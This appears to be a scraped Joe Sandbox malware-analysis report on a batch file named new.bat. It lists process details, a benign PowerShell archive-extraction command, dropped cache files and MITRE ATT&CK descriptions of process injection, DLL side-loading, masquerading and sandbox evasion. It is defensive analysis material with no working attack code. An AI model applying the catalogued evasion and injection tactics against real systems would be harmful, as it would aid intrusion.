File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	17
Start time:	08:31:14
Start date:	12/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report new.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\5a0146bb-fa11-404f-b4d4-cb5d92ac4d44.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Windows Analysis Report
new.bat

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre